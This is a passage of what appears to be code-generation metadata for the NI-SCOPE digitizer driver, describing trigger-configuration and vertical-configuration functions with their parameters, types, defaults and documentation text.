'description': '\nSpecifies whether you want a rising edge or a falling edge to trigger\nthe digitizer. Refer to NISCOPE_ATTR_TRIGGER_SLOPE for more\ninformation.\n'
},
'enum': 'TriggerSlope',
'name': 'slope',
'type': 'ViInt32'
},
{
'default_value': 'datetime.timedelta(seconds=0.0)',
'direction': 'in',
'documentation': {
'description': '\nThe length of time the digitizer waits after detecting a trigger before\nenabling NI-SCOPE to detect another trigger. Refer to\nNISCOPE_ATTR_TRIGGER_HOLDOFF for more information.\n'
},
'name': 'holdoff',
'python_api_converter_name': 'convert_timedelta_to_seconds',
'type': 'ViReal64',
'type_in_documentation': 'float in seconds or datetime.timedelta'
},
{
'default_value': 'datetime.timedelta(seconds=0.0)',
'direction': 'in',
'documentation': {
'description': '\nHow long the digitizer waits after receiving the trigger to start\nacquiring data. Refer to NISCOPE_ATTR_TRIGGER_DELAY_TIME for more\ninformation.\n'
},
'name': 'delay',
'python_api_converter_name': 'convert_timedelta_to_seconds',
'type': 'ViReal64',
'type_in_documentation': 'float in seconds or datetime.timedelta'
}
],
'returns': 'ViStatus'
},
'ConfigureTriggerEdge': {
'documentation': {
'description': '\nConfigures common properties for analog edge triggering.\n\nWhen you initiate an acquisition, the digitizer waits for the start\ntrigger, which is configured through the NISCOPE_ATTR_ACQ_ARM_SOURCE\n(Start Trigger Source) attribute. The default is immediate. Upon\nreceiving the start trigger the digitizer begins sampling pretrigger\npoints. After the digitizer finishes sampling pretrigger points, the\ndigitizer waits for a reference (stop) trigger that you specify with a\nfunction such as this one. Upon receiving the reference trigger the\ndigitizer finishes the acquisition after completing posttrigger\nsampling. With each Configure Trigger function, you specify\nconfiguration parameters such as the trigger source and the amount of\ntrigger delay.\n',
'note': '\nSome features are not supported by all digitizers. Refer to `Features\nSupported by\nDevice <REPLACE_DRIVER_SPECIFIC_URL_1(features_supported_main)>`__ for\nmore information.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': '\nSpecifies the trigger source. Refer to NISCOPE_ATTR_TRIGGER_SOURCE\nfor defined values.\n'
},
'name': 'triggerSource',
'type': 'ViConstString'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe voltage threshold for the trigger. Refer to\nNISCOPE_ATTR_TRIGGER_LEVEL for more information.\n'
},
'name': 'level',
'type': 'ViReal64'
},
{
'default_value': 'TriggerSlope.POSITIVE',
'direction': 'in',
'documentation': {
'description': '\nSpecifies whether you want a rising edge or a falling edge to trigger\nthe digitizer. Refer to NISCOPE_ATTR_TRIGGER_SLOPE for more\ninformation.\n'
},
'enum': 'TriggerSlope',
'name': 'slope',
'type': 'ViInt32'
},
{
'direction': 'in',
'documentation': {
'description': '\nApplies coupling and filtering options to the trigger signal. Refer to\nNISCOPE_ATTR_TRIGGER_COUPLING for more information.\n'
},
'enum': 'TriggerCoupling',
'name': 'triggerCoupling',
'type': 'ViInt32'
},
{
'default_value': 'datetime.timedelta(seconds=0.0)',
'direction': 'in',
'documentation': {
'description': '\nThe length of time the digitizer waits after detecting a trigger before\nenabling NI-SCOPE to detect another trigger. Refer to\nNISCOPE_ATTR_TRIGGER_HOLDOFF for more information.\n'
},
'name': 'holdoff',
'python_api_converter_name': 'convert_timedelta_to_seconds',
'type': 'ViReal64',
'type_in_documentation': 'float in seconds or datetime.timedelta'
},
{
'default_value': 'datetime.timedelta(seconds=0.0)',
'direction': 'in',
'documentation': {
'description': '\nHow long the digitizer waits after receiving the trigger to start\nacquiring data. Refer to NISCOPE_ATTR_TRIGGER_DELAY_TIME for more\ninformation.\n'
},
'name': 'delay',
'python_api_converter_name': 'convert_timedelta_to_seconds',
'type': 'ViReal64',
'type_in_documentation': 'float in seconds or datetime.timedelta'
}
],
'returns': 'ViStatus'
},
'ConfigureTriggerGlitch': {
'codegen_method': 'no',
'documentation': {
'description': 'Configures common properties for glitch triggering.\n\nA glitch trigger occurs when a pulse that crosses a vertical threshold you specify and with a polarity you specify also has a width that is either greater than or less than a duration you specify.',
'note': '\nSome features are not supported by all digitizers.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': 'The instrument handle you obtain from niScope_init that identifies a particular instrument session.'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': 'Specifies the trigger source. Refer to NISCOPE_ATTR_TRIGGER_SOURCE for defined values.'
},
'name': 'triggerSource',
'type': 'ViConstString'
},
{
'direction': 'in',
'documentation': {
'description': 'The voltage threshold for the trigger. Refer to NISCOPE_ATTR_TRIGGER_LEVEL for more information.'
},
'name': 'level',
'type': 'ViReal64'
},
{
'direction': 'in',
'documentation': {
'description': '\nglitchWidth specifies, in seconds, the glitch duration to be used in combination with the **glitch condition** that triggers the oscilloscope.\n\nThe oscilloscope triggers when it detects a pulse of duration either less than or greater than this value depending on the value of the NISCOPE_ATTR_GLITCH_CONDITION.\nRefer to the NISCOPE_ATTR_GLITCH_WIDTH property for more information.\n'
},
'name': 'width',
'type': 'ViReal64'
},
{
'direction': 'in',
'documentation': {
'description': 'Specifies the polarity of the pulses that trigger the oscilloscope for glitch triggering. Refer to the NISCOPE_ATTR_GLITCH_POLARITY attribute for defined values.'
},
'enum': 'GlitchPolarity',
'name': 'polarity',
'type': 'ViInt32'
},
{
'direction': 'in',
'documentation': {
'description': 'Specifies whether the oscilloscope triggers on pulses of duration less than or greater than the specified NISCOPE_ATTR_GLITCH_WIDTH. Refer to the NISCOPE_ATTR_GLITCH_CONDITION attribute for defined values.'
},
'enum': 'GlitchCondition',
'name': 'glitchCondition',
'type': 'ViInt32'
},
{
'direction': 'in',
'documentation': {
'description': 'Applies coupling and filtering options to the trigger signal. Refer to NISCOPE_ATTR_TRIGGER_COUPLING for more information.'
},
'enum': 'TriggerCoupling',
'name': 'triggerCoupling',
'type': 'ViInt32'
},
{
'direction': 'in',
'documentation': {
'description': 'The length of time the digitizer waits after detecting a trigger before enabling NI-SCOPE to detect another trigger. Refer to NISCOPE_ATTR_TRIGGER_HOLDOFF for more information.'
},
'name': 'holdoff',
'type': 'ViReal64'
},
{
'direction': 'in',
'documentation': {
'description': 'How long the digitizer waits after receiving the trigger to start acquiring data. Refer to NISCOPE_ATTR_TRIGGER_DELAY_TIME for more information.'
},
'name': 'delay',
'type': 'ViReal64'
}
],
'returns': 'ViStatus'
},
'ConfigureTriggerHysteresis': {
'documentation': {
'description': '\nConfigures common properties for analog hysteresis triggering. This kind\nof trigger specifies an additional value, specified in the\n**hysteresis** parameter, that a signal must pass through before a\ntrigger can occur. This additional value acts as a kind of buffer zone\nthat keeps noise from triggering an acquisition.\n\nWhen you initiate an acquisition, the digitizer waits for the start\ntrigger, which is configured through the\nNISCOPE_ATTR_ACQ_ARM_SOURCE. The default is immediate. Upon\nreceiving the start trigger the digitizer begins sampling pretrigger\npoints. After the digitizer finishes sampling pretrigger points, the\ndigitizer waits for a reference (stop) trigger that you specify with a\nfunction such as this one. Upon receiving the reference trigger the\ndigitizer finishes the acquisition after completing posttrigger\nsampling. With each Configure Trigger function, you specify\nconfiguration parameters such as the trigger source and the amount of\ntrigger delay.\n',
'note': '\nSome features are not supported by all digitizers. Refer to `Features\nSupported by\nDevice <REPLACE_DRIVER_SPECIFIC_URL_1(features_supported_main)>`__ for\nmore information.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': '\nSpecifies the trigger source. Refer to NISCOPE_ATTR_TRIGGER_SOURCE\nfor defined values.\n'
},
'name': 'triggerSource',
'type': 'ViConstString'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe voltage threshold for the trigger. Refer to\nNISCOPE_ATTR_TRIGGER_LEVEL for more information.\n'
},
'name': 'level',
'type': 'ViReal64'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe size of the hysteresis window on either side of the **level** in\nvolts; the digitizer triggers when the trigger signal passes through the\nhysteresis value you specify with this parameter, has the slope you\nspecify with **slope**, and passes through the **level**. Refer to\nNISCOPE_ATTR_TRIGGER_HYSTERESIS for defined values.\n'
},
'name': 'hysteresis',
'type': 'ViReal64'
},
{
'default_value': 'TriggerSlope.POSITIVE',
'direction': 'in',
'documentation': {
'description': '\nSpecifies whether you want a rising edge or a falling edge to trigger\nthe digitizer. Refer to NISCOPE_ATTR_TRIGGER_SLOPE for more\ninformation.\n'
},
'enum': 'TriggerSlope',
'name': 'slope',
'type': 'ViInt32'
},
{
'direction': 'in',
'documentation': {
'description': '\nApplies coupling and filtering options to the trigger signal. Refer to\nNISCOPE_ATTR_TRIGGER_COUPLING for more information.\n'
},
'enum': 'TriggerCoupling',
'name': 'triggerCoupling',
'type': 'ViInt32'
},
{
'default_value': 'datetime.timedelta(seconds=0.0)',
'direction': 'in',
'documentation': {
'description': '\nThe length of time the digitizer waits after detecting a trigger before\nenabling NI-SCOPE to detect another trigger. Refer to\nNISCOPE_ATTR_TRIGGER_HOLDOFF for more information.\n'
},
'name': 'holdoff',
'python_api_converter_name': 'convert_timedelta_to_seconds',
'type': 'ViReal64',
'type_in_documentation': 'float in seconds or datetime.timedelta'
},
{
'default_value': 'datetime.timedelta(seconds=0.0)',
'direction': 'in',
'documentation': {
'description': '\nHow long the digitizer waits after receiving the trigger to start\nacquiring data. Refer to NISCOPE_ATTR_TRIGGER_DELAY_TIME for more\ninformation.\n'
},
'name': 'delay',
'python_api_converter_name': 'convert_timedelta_to_seconds',
'type': 'ViReal64',
'type_in_documentation': 'float in seconds or datetime.timedelta'
}
],
'returns': 'ViStatus'
},
'ConfigureTriggerImmediate': {
'documentation': {
'description': '\nConfigures common properties for immediate triggering. Immediate\ntriggering means the digitizer triggers itself.\n\nWhen you initiate an acquisition, the digitizer waits for a trigger. You\nspecify the type of trigger that the digitizer waits for with a\nConfigure Trigger function, such as niScope_ConfigureTriggerImmediate.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
}
],
'returns': 'ViStatus'
},
'ConfigureTriggerOutput': {
'codegen_method': 'no',
'documentation': {
'description': '\nConfigures the digitizer to generate a signal pulse that other\ndigitizers can detect when configured for digital triggering.\n\nFor Traditional NI-DAQ devices, exported signals are still present in\nthe route after the session is closed. You must clear the route before\nclosing the session, or call niScope_reset.\n\nTo clear the route, call this function again and route\nNISCOPE_VAL_NONE to the line that you had exported. For example, if\nyou originally called this function with the trigger event\nNISCOPE_VAL_STOP_TRIGGER_EVENT routed to the trigger output\nNISCOPE_VAL_RTSI_0, you would call this function again with\nNISCOPE_VAL_NONE routed to NISCOPE_VAL_RTSI_0 to clear the route.\n',
'note': '\nThis function is obsolete. Consider using niScope_ExportSignal\ninstead.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': 'Specifies the condition in which this device generates a digital pulse.'
},
'name': 'triggerEvent',
'type': 'ViInt32'
},
{
'direction': 'in',
'documentation': {
'description': '\nSpecifies the hardware signal line on which the digital pulse is\ngenerated.\n\n**Valid Values**\n\n| NISCOPE_VAL_NO_EVENT\n| NISCOPE_VAL_STOP_TRIGGER_EVENT\n| NISCOPE_VAL_START_TRIGGER_EVENT\n| NISCOPE_VAL_END_OF_ACQUISITION_EVENT\n| NISCOPE_VAL_END_OF_RECORD_EVENT\n'
},
'name': 'triggerOutput',
'type': 'ViString'
}
],
'returns': 'ViStatus'
},
'ConfigureTriggerRunt': {
'codegen_method': 'no',
'documentation': {
'description': 'Configures common properties for runt triggering.\n\nA runt trigger occurs when both the leading edge and trailing edge of a pulse cross only one of two trigger thresholds you specify and with a polarity you specify, where the polarity is relative to the threshold crossed.',
'note': '\nSome features are not supported by all digitizers.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a particular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': 'Specifies the trigger source. Refer to NISCOPE_ATTR_TRIGGER_SOURCE for defined values.'
},
'name': 'triggerSource',
'type': 'ViConstString'
},
{
'direction': 'in',
'documentation': {
'description': 'Specifies, in volts, the lower of two thresholds that bound the vertical range to examine for runt pulses. Refer to the NISCOPE_ATTR_RUNT_LOW_THRESHOLD attribute for more information.'
},
'name': 'lowThreshold',
'type': 'ViReal64'
},
{
'direction': 'in',
'documentation': {
'description': 'Specifies, in volts, the higher of two thresholds that bound the vertical range to examine for runt pulses. Refer to the NISCOPE_ATTR_RUNT_HIGH_THRESHOLD attribute for more information.'
},
'name': 'highThreshold',
'type': 'ViReal64'
},
{
'direction': 'in',
'documentation': {
'description': 'Specifies the polarity of the runt pulses, relative to the runt threshold the pulses cross, that trigger the oscilloscope for runt triggering. Refer to the NISCOPE_ATTR_RUNT_POLARITY attribute for defined values.'
},
'enum': 'RuntPolarity',
'name': 'polarity',
'type': 'ViInt32'
},
{
'direction': 'in',
'documentation': {
'description': 'Applies coupling and filtering options to the trigger signal. Refer to NISCOPE_ATTR_TRIGGER_COUPLING for more information.'
},
'enum': 'TriggerCoupling',
'name': 'triggerCoupling',
'type': 'ViInt32'
},
{
'direction': 'in',
'documentation': {
'description': 'The length of time the digitizer waits after detecting a trigger before enabling NI-SCOPE to detect another trigger. Refer to NISCOPE_ATTR_TRIGGER_HOLDOFF for more information.'
},
'name': 'holdoff',
'type': 'ViReal64'
},
{
'direction': 'in',
'documentation': {
'description': 'How long the digitizer waits after receiving the trigger to start acquiring data. Refer to NISCOPE_ATTR_TRIGGER_DELAY_TIME for more information.'
},
'name': 'delay',
'type': 'ViReal64'
}
],
'returns': 'ViStatus'
},
'ConfigureTriggerSoftware': {
'documentation': {
'description': '\nConfigures common properties for software triggering.\n\nWhen you initiate an acquisition, the digitizer waits for the start\ntrigger, which is configured through the NISCOPE_ATTR_ACQ_ARM_SOURCE\n(Start Trigger Source) attribute. The default is immediate. Upon\nreceiving the start trigger the digitizer begins sampling pretrigger\npoints. After the digitizer finishes sampling pretrigger points, the\ndigitizer waits for a reference (stop) trigger that you specify with a\nfunction such as this one. Upon receiving the reference trigger the\ndigitizer finishes the acquisition after completing posttrigger\nsampling. With each Configure Trigger function, you specify\nconfiguration parameters such as the trigger source and the amount of\ntrigger delay.\n\nTo trigger the acquisition, use niScope_SendSoftwareTriggerEdge.\n',
'note': '\nSome features are not supported by all digitizers. Refer to `Features\nSupported by\nDevice <REPLACE_DRIVER_SPECIFIC_URL_1(features_supported_main)>`__ for\nmore information.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'default_value': 'datetime.timedelta(seconds=0.0)',
'direction': 'in',
'documentation': {
'description': '\nThe length of time the digitizer waits after detecting a trigger before\nenabling NI-SCOPE to detect another trigger. Refer to\nNISCOPE_ATTR_TRIGGER_HOLDOFF for more information.\n'
},
'name': 'holdoff',
'python_api_converter_name': 'convert_timedelta_to_seconds',
'type': 'ViReal64',
'type_in_documentation': 'float in seconds or datetime.timedelta'
},
{
'default_value': 'datetime.timedelta(seconds=0.0)',
'direction': 'in',
'documentation': {
'description': '\nHow long the digitizer waits after receiving the trigger to start\nacquiring data. Refer to NISCOPE_ATTR_TRIGGER_DELAY_TIME for more\ninformation.\n'
},
'name': 'delay',
'python_api_converter_name': 'convert_timedelta_to_seconds',
'type': 'ViReal64',
'type_in_documentation': 'float in seconds or datetime.timedelta'
}
],
'returns': 'ViStatus'
},
'ConfigureTriggerVideo': {
'documentation': {
'description': '\nConfigures the common properties for video triggering, including the\nsignal format, TV event, line number, polarity, and enable DC restore. A\nvideo trigger occurs when the digitizer finds a valid video signal sync.\n\nWhen you initiate an acquisition, the digitizer waits for the start\ntrigger, which is configured through the NISCOPE_ATTR_ACQ_ARM_SOURCE\n(Start Trigger Source) attribute. The default is immediate. Upon\nreceiving the start trigger the digitizer begins sampling pretrigger\npoints. After the digitizer finishes sampling pretrigger points, the\ndigitizer waits for a reference (stop) trigger that you specify with a\nfunction such as this one. Upon receiving the reference trigger the\ndigitizer finishes the acquisition after completing posttrigger\nsampling. With each Configure Trigger function, you specify\nconfiguration parameters such as the trigger source and the amount of\ntrigger delay.\n',
'note': '\nSome features are not supported by all digitizers. Refer to `Features\nSupported by\nDevice <REPLACE_DRIVER_SPECIFIC_URL_1(features_supported_main)>`__ for\nmore information.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': '\nSpecifies the trigger source. Refer to NISCOPE_ATTR_TRIGGER_SOURCE\nfor defined values.\n'
},
'name': 'triggerSource',
'type': 'ViConstString'
},
{
'default_value': False,
'direction': 'in',
'documentation': {
'description': '\nOffsets each video line so the clamping level (the portion of the video\nline between the end of the color burst and the beginning of the active\nimage) is moved to zero volt. Refer to\nNISCOPE_ATTR_ENABLE_DC_RESTORE for defined values.\n'
},
'name': 'enableDcRestore',
'type': 'ViBoolean'
},
{
'direction': 'in',
'documentation': {
'description': '\nSpecifies the type of video signal sync the digitizer should look for.\nRefer to NISCOPE_ATTR_TV_TRIGGER_SIGNAL_FORMAT for more\ninformation.\n'
},
'enum': 'VideoSignalFormat',
'name': 'signalFormat',
'type': 'ViInt32'
},
{
'direction': 'in',
'documentation': {
'description': '\nSpecifies the TV event you want to trigger on. You can trigger on a\nspecific or on the next coming line or field of the signal.\n'
},
'enum': 'VideoTriggerEvent',
'name': 'event',
'type': 'ViInt32'
},
{
'default_value': 1,
'direction': 'in',
'documentation': {
'description': '\nSelects the line number to trigger on. The line number range covers an\nentire frame and is referenced as shown on `Vertical Blanking and\nSynchronization\nSignal <REPLACE_DRIVER_SPECIFIC_URL_1(gray_scale_image)>`__. Refer to\nNISCOPE_ATTR_TV_TRIGGER_LINE_NUMBER for more information.\n\nDefault value: 1\n'
},
'name': 'lineNumber',
'type': 'ViInt32'
},
{
'direction': 'in',
'documentation': {
'description': 'Specifies the polarity of the video signal sync.'
},
'enum': 'VideoPolarity',
'name': 'polarity',
'type': 'ViInt32'
},
{
'direction': 'in',
'documentation': {
'description': '\nApplies coupling and filtering options to the trigger signal. Refer to\nNISCOPE_ATTR_TRIGGER_COUPLING for more information.\n'
},
'enum': 'TriggerCoupling',
'name': 'triggerCoupling',
'type': 'ViInt32'
},
{
'default_value': 'datetime.timedelta(seconds=0.0)',
'direction': 'in',
'documentation': {
'description': '\nThe length of time the digitizer waits after detecting a trigger before\nenabling NI-SCOPE to detect another trigger. Refer to\nNISCOPE_ATTR_TRIGGER_HOLDOFF for more information.\n'
},
'name': 'holdoff',
'python_api_converter_name': 'convert_timedelta_to_seconds',
'type': 'ViReal64',
'type_in_documentation': 'float in seconds or datetime.timedelta'
},
{
'default_value': 'datetime.timedelta(seconds=0.0)',
'direction': 'in',
'documentation': {
'description': '\nHow long the digitizer waits after receiving the trigger to start\nacquiring data. Refer to NISCOPE_ATTR_TRIGGER_DELAY_TIME for more\ninformation.\n'
},
'name': 'delay',
'python_api_converter_name': 'convert_timedelta_to_seconds',
'type': 'ViReal64',
'type_in_documentation': 'float in seconds or datetime.timedelta'
}
],
'returns': 'ViStatus'
},
'ConfigureTriggerWidth': {
'codegen_method': 'no',
'documentation': {
'description': 'Configures common properties for width triggering.\n\nA width trigger occurs when a pulse crossing the vertical threshold you specify, and with a polarity you specify, has a duration either within or outside the range of durations bounded by the low and high duration thresholds you specify.',
'note': '\nSome features are not supported by all digitizers. Refer to `Features\nSupported by\nDevice <REPLACE_DRIVER_SPECIFIC_URL_1(features_supported_main)>`__ for\nmore information.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': 'Specifies the trigger source. Refer to NISCOPE_ATTR_TRIGGER_SOURCE for defined values.'
},
'name': 'triggerSource',
'type': 'ViConstString'
},
{
'direction': 'in',
'documentation': {
'description': 'The voltage threshold for the trigger. Refer to NISCOPE_ATTR_TRIGGER_LEVEL for more information.'
},
'name': 'level',
'type': 'ViReal64'
},
{
'direction': 'in',
'documentation': {
'description': 'Specifies, in seconds, the lower bound on the range of pulse durations that triggers the oscilloscope. Refer to the NISCOPE_ATTR_WIDTH_LOW_THRESHOLD attribute for defined values.'
},
'name': 'lowThreshold',
'type': 'ViReal64'
},
{
'direction': 'in',
'documentation': {
'description': 'Specifies, in seconds, the upper bound on the range of pulse durations that triggers the oscilloscope. Refer to the NISCOPE_ATTR_WIDTH_HIGH_THRESHOLD attribute for defined values.'
},
'name': 'highThreshold',
'type': 'ViReal64'
},
{
'direction': 'in',
'documentation': {
'description': 'Specifies the polarity of the pulses that trigger the oscilloscope for width triggering. Refer to the NISCOPE_ATTR_WIDTH_POLARITY attribute for defined values.'
},
'enum': 'WidthPolarity',
'name': 'polarity',
'type': 'ViInt32'
},
{
'direction': 'in',
'documentation': {
'description': 'Specifies whether the oscilloscope triggers on pulses of duration within or outside the range of pulse durations bounded by **Low Threshold** and **High Threshold**. Refer to the NISCOPE_ATTR_WIDTH_CONDITION attribute for defined values.'
},
'enum': 'WidthCondition',
'name': 'condition',
'type': 'ViInt32'
},
{
'direction': 'in',
'documentation': {
'description': 'Applies coupling and filtering options to the trigger signal. Refer to NISCOPE_ATTR_TRIGGER_COUPLING for more information.'
},
'enum': 'TriggerCoupling',
'name': 'triggerCoupling',
'type': 'ViInt32'
},
{
'direction': 'in',
'documentation': {
'description': 'The length of time the digitizer waits after detecting a trigger before enabling NI-SCOPE to detect another trigger. Refer to NISCOPE_ATTR_TRIGGER_HOLDOFF for more information.'
},
'name': 'holdoff',
'type': 'ViReal64'
},
{
'direction': 'in',
'documentation': {
'description': 'How long the digitizer waits after receiving the trigger to start acquiring data. Refer to NISCOPE_ATTR_TRIGGER_DELAY_TIME for more information.'
},
'name': 'delay',
'type': 'ViReal64'
}
],
'returns': 'ViStatus'
},
'ConfigureTriggerWindow': {
'documentation': {
'description': '\nConfigures common properties for analog window triggering. A window\ntrigger occurs when a signal enters or leaves a window you specify with\nthe **high level** or **low level** parameters.\n\nWhen you initiate an acquisition, the digitizer waits for the start\ntrigger, which is configured through the NISCOPE_ATTR_ACQ_ARM_SOURCE\n(Start Trigger Source) attribute. The default is immediate. Upon\nreceiving the start trigger the digitizer begins sampling pretrigger\npoints. After the digitizer finishes sampling pretrigger points, the\ndigitizer waits for a reference (stop) trigger that you specify with a\nfunction such as this one. Upon receiving the reference trigger the\ndigitizer finishes the acquisition after completing posttrigger\nsampling. With each Configure Trigger function, you specify\nconfiguration parameters such as the trigger source and the amount of\ntrigger delay.\n\nTo trigger the acquisition, use niScope_SendSoftwareTriggerEdge.\n',
'note': 'Some features are not supported by all digitizers.'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': '\nSpecifies the trigger source. Refer to NISCOPE_ATTR_TRIGGER_SOURCE\nfor defined values.\n'
},
'name': 'triggerSource',
'type': 'ViConstString'
},
{
'direction': 'in',
'documentation': {
'description': '\nPasses the voltage threshold you want the digitizer to use for low\ntriggering.\n'
},
'name': 'lowLevel',
'type': 'ViReal64'
},
{
'direction': 'in',
'documentation': {
'description': '\nPasses the voltage threshold you want the digitizer to use for high\ntriggering.\n'
},
'name': 'highLevel',
'type': 'ViReal64'
},
{
'direction': 'in',
'documentation': {
'description': '\nSpecifies whether you want the trigger to occur when the signal enters\nor leaves a window.\n'
},
'enum': 'TriggerWindowMode',
'name': 'windowMode',
'type': 'ViInt32'
},
{
'direction': 'in',
'documentation': {
'description': '\nApplies coupling and filtering options to the trigger signal. Refer to\nNISCOPE_ATTR_TRIGGER_COUPLING for more information.\n'
},
'enum': 'TriggerCoupling',
'name': 'triggerCoupling',
'type': 'ViInt32'
},
{
'default_value': 'datetime.timedelta(seconds=0.0)',
'direction': 'in',
'documentation': {
'description': '\nThe length of time the digitizer waits after detecting a trigger before\nenabling NI-SCOPE to detect another trigger. Refer to\nNISCOPE_ATTR_TRIGGER_HOLDOFF for more information.\n'
},
'name': 'holdoff',
'python_api_converter_name': 'convert_timedelta_to_seconds',
'type': 'ViReal64',
'type_in_documentation': 'float in seconds or datetime.timedelta'
},
{
'default_value': 'datetime.timedelta(seconds=0.0)',
'direction': 'in',
'documentation': {
'description': '\nHow long the digitizer waits after receiving the trigger to start\nacquiring data. Refer to NISCOPE_ATTR_TRIGGER_DELAY_TIME for more\ninformation.\n'
},
'name': 'delay',
'python_api_converter_name': 'convert_timedelta_to_seconds',
'type': 'ViReal64',
'type_in_documentation': 'float in seconds or datetime.timedelta'
}
],
'returns': 'ViStatus'
},
'ConfigureTvTriggerLineNumber': {
'codegen_method': 'no',
'documentation': {
'description': '\nThis function is included for compliance with the IviScope Class\nSpecification.\n\nConfigures the TV line upon which the instrument triggers. The line\nnumber is absolute and not relative to the field of the TV signal.\n\nThis function affects instrument behavior only if the trigger type is\nset to NISCOPE_VAL_TV_TRIGGER and the TV trigger event is set to\nNISCOPE_VAL_TV_EVENT_LINE_NUMBER. Call\nniScope_ConfigureTVTriggerSource to set the TV trigger event before\ncalling this function.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': '\nSpecify the line number of the signal you want to trigger off of. The\nvalid ranges of the attribute depend on the signal format configured.\n\nDefault Value: 1\n',
'table_body': [
[
'M-NTSC, 480i, 480p',
'1 to 525'
],
[
'BG/PAL, SECAM, 576i, 576p',
'1 to 625'
],
[
'720p',
'1 to 750'
],
[
'1080i,1080p',
'1 to 1,125'
]
],
'table_header': [
'Signal Format',
'Line Numbers'
]
},
'name': 'lineNumber',
'type': 'ViInt32'
}
],
'returns': 'ViStatus'
},
'ConfigureTvTriggerSource': {
'codegen_method': 'no',
'documentation': {
'description': '\nConfigures the instrument for TV triggering. It configures the TV signal\nformat, the event, and the signal polarity.\n\nThis function affects instrument behavior only if the trigger type is\nNISCOPE_VAL_TV_TRIGGER. Set the trigger type and trigger coupling\nbefore calling this function.\n',
'note': '\nThis function is included for compliance with the IviScope Class\nSpecification.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': '\nPass the source you want the digitizer to monitor for a trigger.\n\nDefined Values\n\n| "0"—Channel 0\n| "1"—Channel 1\n| NISCOPE_VAL_EXTERNAL—Analog External Trigger Input\n'
},
'name': 'source',
'type': 'ViString'
},
{
'direction': 'in',
'documentation': {
'description': '\nSpecifies the Video/TV signal format.\n\nDefined Values\n\n| NISCOPE_VAL_NTSC (1)\n| NISCOPE_VAL_PAL (2)\n| NISCOPE_VAL_SECAM (3)\n'
},
'name': 'signalFormat',
'type': 'ViInt32'
},
{
'direction': 'in',
'documentation': {
'description': '\nVideo/TV event to trigger off of.\n\nDefined Values\n\n| NISCOPE_VAL_TV_EVENT_FIELD1 (1)—trigger on field 1 of the signal\n| NISCOPE_VAL_TV_EVENT_FIELD2 (2)—trigger on field 2 of the signal\n| NISCOPE_VAL_TV_EVENT_ANY_FIELD (3)—trigger on the first field\n acquired\n| NISCOPE_VAL_TV_EVENT_ANY_LINE (4)—trigger on the first line\n acquired\n| NISCOPE_VAL_TV_EVENT_LINE_NUMBER (5)—trigger on a specific line\n of a video signal. Valid values vary depending on the signal format\n configured.\n'
},
'name': 'event',
'type': 'ViInt32'
},
{
'direction': 'in',
'documentation': {
'description': '\n| Specifies the polarity of the video signal to trigger off of.\n\nDefined Values\n\n| NISCOPE_VAL_TV_POSITIVE (1)\n| NISCOPE_VAL_TV_NEGATIVE (2)\n'
},
'name': 'polarity',
'type': 'ViInt32'
}
],
'returns': 'ViStatus'
},
'ConfigureVertical': {
'documentation': {
'description': '\nConfigures the most commonly configured attributes of the digitizer\nvertical subsystem, such as the range, offset, coupling, probe\nattenuation, and the channel.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': "\nThe channel to configure. For more information, refer to `Channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm','cvichannelstringsyntaxforc)>`__.\n"
},
'name': 'channelList',
'type': 'ViConstString'
},
{
'direction': 'in',
'documentation': {
'description': '\nSpecifies the vertical range. Refer to NISCOPE_ATTR_VERTICAL_RANGE for\nmore information.\n'
},
'name': 'range',
'type': 'ViReal64'
},
{
'default_value': 0.0,
'direction': 'in',
'documentation': {
'description': '\nSpecifies the vertical offset. Refer to NISCOPE_ATTR_VERTICAL_OFFSET\nfor more information.\n'
},
'name': 'offset',
'type': 'ViReal64'
},
{
